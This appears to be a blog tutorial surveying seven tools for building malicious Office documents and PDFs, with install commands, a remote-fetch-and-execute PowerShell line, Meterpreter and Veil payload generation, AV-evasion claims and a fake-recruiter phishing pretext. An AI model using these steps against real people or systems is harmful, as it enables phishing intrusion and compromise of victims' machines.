One way to gain your initial foothold in a network is through the use of an evil office document. The idea is that you send an email (or some other means of delivery) to the target(s) with an innocent looking document. What the victim doesn't know is that the document has some sort of payload in it. There are a number of ways to accomplish creating one of these documents. Here I'll try to quickly cover seven of them:
1. Lucky Strike
This tool is "a PowerShell based generator of malicious .xls or .doc documents. All your payloads are saved into a database for easy retrieval & embedding into a new or existing document. Lucky Strike provides you several infection methods designed to get your payloads to execute without tripping AV." The tool is meant to automate the creation of malicious payloads. It is a menu-driven Powershell script and even allows for the re-use of generated payloads. There is also built-in AV evasion techniques. Installation is as simple as running:
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Shellntel/luckystrike/master/install.ps1')
Once installed, run the
luckystrike.ps1 file from the luckystrike directory. You'll be greeted with the main menu:
Let's create our first payload. Following the menus, I've created a PowerShell script called test:
Which we can has been added to our catalog:
From here, you can create or update a file to embed your payload.
This is a "collection of scripts and templates to generate Office documents embedded with the DDE, macro-less command execution technique." Installation can be found here. Once installed, we can run it with
python ddeexcel.py for Excel or
python ddeword.py for Word. Before we can create our payload, we need to understand what DDE is and how we can leverage it in our payload. DDE stands for Dynamic Data Exchange. From the Microsoft doc page, "It sends messages between applications that share data and uses shared memory to exchange data between applications." Ok, so we'll use one application to run another. Following this post, we will create an Excel document which launches the calculator.
That's it, we have a malicious payload embedded in a document. Let's move it to a Windows machine and see if it works! Upon openeing the document:
Looks promising, but I wasn't able to get it to actually launch the calculator. Or so I thought. I looked at Task Manager to view my background processes:
So it kinda worked. I never saw the calculator pop up on my screen. Despite that, this tool was really easy to set up and use. More research would need to be done on my end to get this to work properly, but I've still got five more tools I want to get through!
This tool "generates architecture independent VBA code to be used in Office documents or templates and automates bypassing application control and exploit mitigation software." From the github page, "It was designed with automation and integration in mind." Installation is as simple as
git clone https://github.com/mwrlabs/wePWNise.git . The help menu shows how easy this tool is to use:
Some usage examples can be found here.
This is a "collection of scripts to aid in delivering payloads via Office Macros." Once again, installation is as simple as
git clone https://github.com/khr0x40sh/MacroShop.git . Once installed, we can see that we have a few scripts we can run:
Straight from the github page, here's a summary of the different scripts:
- macro_safe.py - Generates safe for VB inclusion into an excel spreadsheet. Requires a batch file generated by Veil-Evasion powershell payloads. To include, enable the developer menu in Office, head to Visual Basic tab, double click on This_Workbook and paste the contents of the output file. Syntax is:
python macro_safe.py test.bat test.txt
- exeinvba.py - Generates VB code for including and unpacking a portable executable onto a file system for delivery via Office Macro. To include, enable the developer menu in Office, head to Visual Basic tab, double click on This_Workbook and paste the contents of the output file. Requires a PE. Syntax is:
python exeinvba.py --exe test.exe --out test.vb --dest "C:\Users\Public\Documents\test.exe"Ensure any backslashes are escaped in the dest variable
- macro_safe_old.py - Same as macro_safe.py, just uses powershell vice VB for architecture detection to call the correct version of powershell.
- b64_enc.py - Watered down version of exeinvba.py that will output both the raw base64 string of the executable and the variable specific section of the VB. May be useful for use with different VB templates or other methods that may require an executable passed as a base64 string somewhere. Automatically stores output into base64_output.txt (raw) and base64_output.vb. Syntax is:
python b64_enc.py test.exe
So let's run through creating another malicious Excel document. We'll run
./macro_safe.py and see that we need to provide Veil output and output text:
So taking a step back, we'll need to create a Veil payload. The setup for Veil is also as simple as:
apt -y install veil
/usr/share/veil/config/setup.sh --force --silent
git clone https://github.com/Veil-Framework/Veil.git
./config/setup.sh --force --silent
Once installed, we can take a look at the example usage to see how to create our output:
use <payload of your choice>
Fill in the options to meet your needs.
We'll want to keep in mind where Veil stored our payload (
/var/lib/veil/output/source ) The output will look something like:
Back in the MacroShop directory, we'll run
./macro_safe.py /var/lib/veil/output/source/test.bat test which will output our final macro. It will look something like:
You can add this output to your malicious document as part of the macro.
Macro_pack is "used to automatize obfuscation and generation of Office documents, VB scripts, shortcuts, and other formats for pentest, demo, and social engineering assessments." Once again, installation is as simple as:
git clone https://github.com/sevagas/macro_pack.git
pip3 install -r requirements.txt
Once installed, they have a test script that you can run with
python3 test/mp_test.py . It will output the results which will look something like:
Now that we know what types of payloads we can create, lets make one. Run the tool from the
src directory with:
python3 macro_pack.py. First off, append
-h to the command to get the help output. This will help in generating your macro.
Macro_pack comes with some template VBA payloads, which we will use for this demo. An example would be:
python3 macro_pack.py -t METERPRETER -G test.xls -p
-t <template> ,
-G <output_file and
-p to print output.
Any necessary parameters that you did not provide will be prompted for during creation:
And that's it, we have our payload and our meterpreter resource file ready to go! Yet another quick and easy to use tool.
Worse-PDF will turn a normal PDF file into a malicious one. This can be useful for gaining the trust of your victims. Especially if they would likely be expecting a legitimate PDF from you. For example, simulating that you are a recruiter and sending them a job description. Yet again, installation is a simple as:
git clone https://github.com/3gstudent/Worse-PDF.git
Once installed, run with
python WorsePDF.py <normal PDF> <serverIP>.
Yet another tool that's quick and easy.
7. Empire’s Cross Platform Office Macro
This write-up covers the creation of payloads that "include some intelligence in our macro malware to decide whether to execute a PowerShell or Python payload based on the target operating system. " This utilizes the
windows/macro stagers within Empire. Since this info is coming from another write-up, I won't reinvent the wheel by walking you through the same steps they cover. Instead, I recommend checking out the link above. To summarize, the steps are:
- Set up an Empire listener.
- Set up the
windows/macrostagers and use the generate command.
- Copy the output from both macros into a text editor.
- Paste the Declare statement from the Mac payload generation into the macro editor in Word.
- Create an
- Set it up to run the Mac macro, then the Windows macro with an if/else statement.
- Send out your malicious document.
Hopefully you've taken something away from my brief coverage of these tools. Thanks for reading!